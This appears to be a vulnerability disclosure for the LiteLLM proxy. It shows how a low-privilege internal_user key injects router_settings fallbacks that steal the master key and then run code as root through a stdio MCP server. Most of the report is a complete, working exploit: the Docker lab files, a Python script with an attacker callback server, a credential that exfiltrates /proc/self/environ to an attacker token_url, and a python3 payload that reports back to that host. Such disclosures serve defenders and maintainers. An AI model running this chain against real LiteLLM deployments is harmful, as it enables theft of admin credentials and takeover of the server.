Authenticated internal_user → container RCE via key-level router_settings fallbacks
Summary
A low-privilege internal_user can attach an arbitrary router_settings.fallbacks dict to a virtual key via POST /key/generate. LiteLLM stores it and later merges it verbatim into a live provider call. The dict accepts provider, credentials and network config, so the attacker supplies a Google external_account credential with credential_source.file = /proc/self/environ and an attacker-controlled token_url. When the fallback fires, Google Auth reads the proxy's environment and POSTs it to the attacker, disclosing LITELLM_MASTER_KEY. That key authenticates as PROXY_ADMIN, which registers a stdio MCP server running python3 — its health check spawns the process, giving arbitrary code execution inside the LiteLLM container.
- Class: authenticated privilege escalation → RCE (P2)
- Requires: one valid
internal_userkey. No misconfiguration — the master key is correctly set and is stolen, not absent (so this is not the out-of-scope "no master_key" case). - Impact: Python execution as
uid=0in the LiteLLM container; full master-key compromise; arbitrary file read as a standalone primitive. - Version:
1.95.0, commit2412326, default config.
Root cause
(a) A virtual key accepts unconstrained key-level router settings. KeyRequestBase.router_settings is an UpdateRouterConfig whose fallbacks is a free-form list of dicts — not limited to model names (types/router.py):
class UpdateRouterConfig(BaseModel):
...
fallbacks: Optional[List[dict]] = None # arbitrary dicts, not just model names
(b) /key/generate persists it verbatim, with no privilege filter. The non-admin path checks user_id/team_id/budgets but never rejects or reduces router_settings for an internal_user (key_management_endpoints.py:3635):
# attacker-controlled router_settings serialized straight into the key row
router_settings_json = safe_dumps(router_settings) if router_settings is not None else safe_dumps({})
(c) The stored fallback dict is merged into the live provider call. This is the trust-boundary crossing: when the primary model fails, every field of the attacker's dict is spread into the request kwargs (fallback_event_handlers.py:131-134):
if isinstance(mg, str):
kwargs["model"] = mg
elif isinstance(mg, dict):
kwargs.update(mg) # <-- provider, credentials, api_base ... all attacker-set
The key row's stored settings reach this point via a per-request override (lookup → apply).
(d) external_account credentials turn that into arbitrary file read + exfiltration. The fallback selects vertex_ai_beta with a serialized Google external-account credential; LiteLLM builds identity-pool creds and refreshes them, and the refresh reads credential_source.file and POSTs it to token_url (vertex_llm_base.py:131):
if "type" in json_obj and json_obj["type"] == "external_account":
creds = self._credentials_from_identity_pool(json_obj, scopes=...)
...
credentials.refresh(Request()) # reads credential_source.file -> POST to token_url
With credential_source.file = /proc/self/environ, the attacker's token_url receives LITELLM_MASTER_KEY.
(e) The stolen master key reaches the admin-only stdio-MCP sink. POST /v1/mcp/server requires PROXY_ADMIN — satisfied by the stolen key — and python3 is in the default stdio command allowlist, so the health check spawns it (MCP create · allowlist).
The primary auth bug is (b); the MCP feature is only the final sink.
Reproduction (self-contained — no attachments required)
The lab is three files, written inline below: docker-compose.yml, config.yaml and exp.py. It is a stock LiteLLM + Postgres deployment; the only deviations from the upstream docker-compose.yml are pinning the source commit under test and a config.yaml with one ordinary model (every usable proxy configures at least one — its identity is irrelevant, the exploit just forces it to fail). Stock entrypoint, no custom code.
Requirements: Linux x86-64, Docker + Compose, Python 3.9+, outbound GitHub access. Run each step below in order, in one empty directory — expand each file block, paste it, then run the command under it.
1. Write the deployment files, then start the proxy (built at the pinned commit, bound to 127.0.0.1:4000):
write docker-compose.yml
cat > docker-compose.yml <<'COMPOSE'
# Default-style deployment: LiteLLM proxy + PostgreSQL, stock entrypoint.
# Deviations from the upstream docker-compose.yml are only: (1) `build:` pins the
# exact source commit under test (upstream ships a pre-built image), and (2) a
# config.yaml with one ordinary model — every usable proxy configures at least
# one. Master key, STORE_MODEL_IN_DB and DB creds are the standard values.
services:
db:
image: postgres:16
environment:
POSTGRES_DB: litellm
POSTGRES_USER: llmproxy
POSTGRES_PASSWORD: dbpassword9090
healthcheck:
test: ["CMD-SHELL", "pg_isready -U llmproxy -d litellm"]
interval: 2s
timeout: 5s
retries: 30
volumes:
- postgres-data:/var/lib/postgresql/data
litellm:
build:
context: https://github.com/BerriAI/litellm.git#24123269ccb76f36298a2457589f08bd3141072c
image: litellm-rce-target:24123269ccb76f36298a2457589f08bd3141072c
depends_on:
db:
condition: service_healthy
environment:
DATABASE_URL: postgresql://llmproxy:dbpassword9090@db:5432/litellm
LITELLM_MASTER_KEY: sk-1234
STORE_MODEL_IN_DB: "True"
command: ["--config=/app/config.yaml", "--port=4000"]
volumes:
- ./config.yaml:/app/config.yaml:ro
ports:
- "127.0.0.1:${LITELLM_PORT:-4000}:4000"
extra_hosts:
- host.docker.internal:host-gateway
healthcheck:
test: ["CMD-SHELL", "python3 -c \"import urllib.request; urllib.request.urlopen('http://127.0.0.1:4000/health/liveliness')\""]
interval: 3s
timeout: 5s
retries: 60
start_period: 20s
volumes:
postgres-data:
COMPOSE
write config.yaml
cat > config.yaml <<'CONFIG'
# One ordinary model — every usable LiteLLM proxy configures at least one.
# Its identity is irrelevant to the bug: the exploit forces this primary to fail
# (tiny per-request timeout) so the attacker-supplied key-level fallback runs.
model_list:
- model_name: gpt-3.5-turbo
litellm_params:
model: openai/gpt-3.5-turbo
api_key: sk-not-a-real-key
CONFIG
docker compose up --build --wait # LITELLM_PORT=4001 to change the port
2. Create one ordinary internal_user — the single one-time admin action any real proxy performs. /user/new returns the user's virtual key:
USER_KEY=$(curl -s -X POST http://127.0.0.1:4000/user/new \
-H 'Authorization: Bearer sk-1234' -H 'Content-Type: application/json' \
-d '{"user_role":"internal_user"}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["key"])')
3. Write the exploit, then run it with ONLY that low-privilege key (the master key is never given to exp.py):
write exp.py (stdlib only)
cat > exp.py <<'PYEOF'
#!/usr/bin/env python3
import argparse
import concurrent.futures
import http.server
import json
import os
import platform
import socket
import sys
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid
class ExploitError(RuntimeError):
pass
def parse_args():
parser = argparse.ArgumentParser(
description="LiteLLM internal_user router-settings to container RCE reproducer"
)
parser.add_argument("--url", default="http://127.0.0.1:4000")
parser.add_argument("--model", default="gpt-3.5-turbo")
parser.add_argument("--callback-host", default="host.docker.internal")
parser.add_argument("--secret-file", default="/proc/self/environ")
parser.add_argument("--allow-remote", action="store_true")
return parser.parse_args()
class ApiClient:
def __init__(self, base_url):
self.base_url = base_url.rstrip("/")
def request(self, route, method="GET", bearer=None, body=None, timeout=20):
headers = {}
payload = None
if bearer:
headers["Authorization"] = "Bearer " + bearer
if body is not None:
headers["Content-Type"] = "application/json"
payload = json.dumps(body).encode()
request = urllib.request.Request(
self.base_url + route,
data=payload,
headers=headers,
method=method,
)
try:
with urllib.request.urlopen(request, timeout=timeout) as response:
status = response.status
raw = response.read()
except urllib.error.HTTPError as error:
status = error.code
raw = error.read()
try:
parsed = json.loads(raw) if raw else None
except (json.JSONDecodeError, UnicodeDecodeError):
parsed = raw.decode("utf-8", errors="replace")
return status, parsed
def require_ok(result, stage, expected=None):
status, body = result
valid = 200 <= status < 300
if expected is not None:
valid = valid and status == expected
if not valid:
raise ExploitError(
"{} failed with HTTP {}: {}".format(stage, status, json.dumps(body))
)
return body
def extract_master_key(subject_token):
for entry in subject_token.split("\0"):
if entry.startswith("LITELLM_MASTER_KEY="):
return entry[len("LITELLM_MASTER_KEY=") :]
for line in subject_token.splitlines():
if line.startswith("LITELLM_MASTER_KEY="):
return line[len("LITELLM_MASTER_KEY=") :]
return None
class CallbackState:
def __init__(self, run_id, secret_file):
self.run_id = run_id
self.secret_file = secret_file
self.master_key = None
self.proof = None
self.error = None
self.leak_event = threading.Event()
self.proof_event = threading.Event()
def make_callback_handler(state):
class CallbackHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, _format, *_args):
return
def send_json(self, status, body):
data = json.dumps(body).encode()
self.send_response(status)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
def do_POST(self):
try:
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length)
if self.path == "/oauth/{}".format(state.run_id):
form = urllib.parse.parse_qs(body.decode("utf-8"))
subject_token = form.get("subject_token", [""])[0]
for kvstring in subject_token.split("\0"):
print(f" {kvstring}")
master_key = extract_master_key(subject_token)
if not master_key:
state.error = ExploitError(
"Exfiltrated file did not contain LITELLM_MASTER_KEY ({})".format(
state.secret_file
)
)
self.send_json(400, {"error": "master_key_not_found"})
state.leak_event.set()
return
state.master_key = master_key
self.send_json(
200,
{
"access_token": "secret-oauth-" + state.run_id,
"token_type": "Bearer",
"expires_in": 3600,
},
)
state.leak_event.set()
return
if self.path == "/vertex/{}:generateContent".format(state.run_id):
self.send_json(
500, {"error": {"message": "intentional fallback sink"}}
)
return
if self.path == "/proof/{}".format(state.run_id):
state.proof = json.loads(body)
self.send_response(204)
self.end_headers()
state.proof_event.set()
return
self.send_response(404)
self.end_headers()
except Exception as error:
state.error = error
state.leak_event.set()
state.proof_event.set()
self.send_response(400)
self.end_headers()
return CallbackHandler
def external_account_credentials(oauth_url, secret_file):
return json.dumps(
{
"type": "external_account",
"audience": (
"//iam.googleapis.com/projects/123/locations/global/"
"workloadIdentityPools/pool/providers/provider"
),
"subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
"token_url": oauth_url,
"credential_source": {
"file": secret_file,
"format": {"type": "text"},
},
}
)
def create_exploit_key(client, internal_key, user_id, model, state, callback_host, port):
oauth_url = "http://{}:{}/oauth/{}".format(callback_host, port, state.run_id)
vertex_url = "http://{}:{}/vertex/{}".format(callback_host, port, state.run_id)
body = require_ok(
client.request(
"/key/generate",
method="POST",
bearer=internal_key,
body={
"user_id": user_id,
"key_alias": "exploit-{}".format(state.run_id),
"router_settings": {
"fallbacks": [
{
"model": model,
"custom_llm_provider": "vertex_ai_beta",
"vertex_project": "p2o-project",
"vertex_location": "us-central1",
"vertex_credentials": external_account_credentials(
oauth_url, state.secret_file
),
"api_base": vertex_url,
"timeout": 5,
"num_retries": 0,
}
]
},
},
),
"malicious key generation",
)
key = body.get("key") if isinstance(body, dict) else None
if not key:
raise ExploitError("Key generation response did not contain a virtual key")
print(
"[1/5] low-level internal_user key stored unchecked provider fallback settings"
)
return key
def trigger_fallback(client, exploit_key, model):
return client.request(
"/v1/chat/completions",
method="POST",
bearer=exploit_key,
body={
"model": model,
"messages": [{"role": "user", "content": "p2o"}],
"timeout": 0.000001,
},
timeout=30,
)
def python_proof_payload(marker_path, proof_url):
statements = [
"import json,os,platform,socket,urllib.request",
"marker={}".format(repr(marker_path)),
"open(marker,'w').write('LITELLM_INTERNAL_USER_E2E_RCE\\n')",
(
"data=json.dumps({'proof':'LITELLM_INTERNAL_USER_E2E_RCE',"
"'uid':os.getuid() if hasattr(os,'getuid') else None,"
"'cwd':os.getcwd(),'hostname':socket.gethostname(),"
"'platform':platform.platform(),'marker':marker}).encode()"
),
(
"req=urllib.request.Request({},data=data,"
"headers={{'Content-Type':'application/json'}},method='POST')"
).format(repr(proof_url)),
"urllib.request.urlopen(req,timeout=5).read()",
]
return ";".join(statements)
def main():
args = parse_args()
parsed_target = urllib.parse.urlparse(args.url)
if parsed_target.hostname not in {"127.0.0.1", "localhost", "::1"}:
if not args.allow_remote:
raise ExploitError(
"Refusing a non-loopback target without --allow-remote"
)
client = ApiClient(args.url)
internal_key = os.environ.get("LITELLM_INTERNAL_USER_KEY")
if not internal_key:
raise ExploitError(
"Missing low-level key in LITELLM_INTERNAL_USER_KEY"
)
self_info = require_ok(
client.request("/user/info", bearer=internal_key), "self user lookup"
)
user_id = self_info.get("user_id") or self_info.get("user_info", {}).get(
"user_id"
)
if not user_id:
raise ExploitError("Unable to determine internal_user user_id")
started_at = time.monotonic()
run_id = str(uuid.uuid4()).replace("-", "_")
server_id = "p2o_internal_rce_" + run_id
marker_path = "/tmp/litellm_internal_p2o_" + run_id
state = CallbackState(run_id, args.secret_file)
server = http.server.ThreadingHTTPServer(
("0.0.0.0", 0), make_callback_handler(state)
)
callback_port = server.server_address[1]
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
server_thread.start()
try:
exploit_key = create_exploit_key(
client,
internal_key,
user_id,
args.model,
state,
args.callback_host,
callback_port,
)
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:
request_future = executor.submit(
trigger_fallback, client, exploit_key, args.model
)
if not state.leak_event.wait(15):
raise ExploitError(
"Timed out waiting for external-account subject token"
)
request_future.result(timeout=30)
if state.error:
raise state.error
if not state.master_key:
raise ExploitError("OAuth callback did not yield a master key")
print(
"[2/5] fallback exfiltrated LITELLM_MASTER_KEY from {}".format(
args.secret_file
)
)
proof_url = "http://{}:{}/proof/{}".format(
args.callback_host, callback_port, run_id
)
mcp_body = require_ok(
client.request(
"/v1/mcp/server",
method="POST",
bearer=state.master_key,
body={
"server_id": server_id,
"server_name": server_id,
"alias": server_id,
"transport": "stdio",
"command": "python3",
"args": ["-c", python_proof_payload(marker_path, proof_url)],
"env": {},
"allow_all_keys": False,
"mcp_info": {"proof_marker": marker_path},
},
),
"stdio MCP server creation",
expected=201,
)
if (
mcp_body.get("server_id") != server_id
or mcp_body.get("transport") != "stdio"
):
raise ExploitError("Unexpected MCP server creation response")
print("[3/5] recovered master key created a stdio MCP server")
require_ok(
client.request(
"/v1/mcp/server/health?server_ids={}".format(
urllib.parse.quote(server_id)
),
bearer=state.master_key,
),
"stdio MCP health-check trigger",
)
print("[4/5] MCP health check spawned the controlled command")
if not state.proof_event.wait(15):
raise ExploitError("Timed out waiting for target execution proof")
if state.error:
raise state.error
if state.proof.get("proof") != "LITELLM_INTERNAL_USER_E2E_RCE":
raise ExploitError("Received invalid target execution proof")
print("[5/5] target Python process returned container execution evidence")
output = {
"success": True,
"elapsed_seconds": round(time.monotonic() - started_at, 3),
"target": args.url.rstrip("/"),
"model": args.model,
"server_id": server_id,
"proof": state.proof,
"attacker_host": socket.gethostname(),
"attacker_platform": platform.platform(),
}
print(json.dumps(output, indent=2))
finally:
state.master_key = None
server.shutdown()
server.server_close()
server_thread.join(timeout=2)
if __name__ == "__main__":
try:
main()
except (ExploitError, OSError, urllib.error.URLError) as error:
print("error: {}".format(error), file=sys.stderr)
sys.exit(1)
PYEOF
LITELLM_INTERNAL_USER_KEY="$USER_KEY" python3 exp.py --url http://127.0.0.1:4000
# add --allow-remote for a non-loopback target
exp.py runs five stages:
- 0 — read the internal_user's
user_idvia/user/info. - 1 —
POST /key/generatewith the maliciousexternal_accountfallback. - 2 —
POST /v1/chat/completionswith a tiny timeout → primary fails → fallback reads/proc/self/environ→ callback extractsLITELLM_MASTER_KEY. - 3 —
POST /v1/mcp/server(stdio,python3 -c <proof>) with the master key. - 4 —
GET /v1/mcp/server/healthspawns the process. - 5 — the process writes a
/tmpmarker and reports back; success requires it.
Expected output (proof of container execution):
{ "success": true,
"proof": { "proof": "LITELLM_INTERNAL_USER_E2E_RCE", "uid": 0,
"cwd": "/app", "hostname": "<container-id>",
"marker": "/tmp/litellm_internal_p2o_<run-id>" } }
uid:0 + the container cwd/hostname + the on-disk marker prove attacker code ran in the container — from nothing but one internal_user key.
4. Confirm out-of-band — read the marker straight from the container (independent of the exploit's own callback). It is owned by root, proving code executed as uid=0 inside the LiteLLM container:
docker compose exec litellm sh -c 'ls -l /tmp/litellm_internal_p2o_* && cat /tmp/litellm_internal_p2o_*'
# -rw-r--r-- 1 root root 30 ... /tmp/litellm_internal_p2o_<run-id>
# LITELLM_INTERNAL_USER_E2E_RCE
https://github.com/user-attachments/assets/84ecbe71-512c-4851-b227-80fc822e2f0f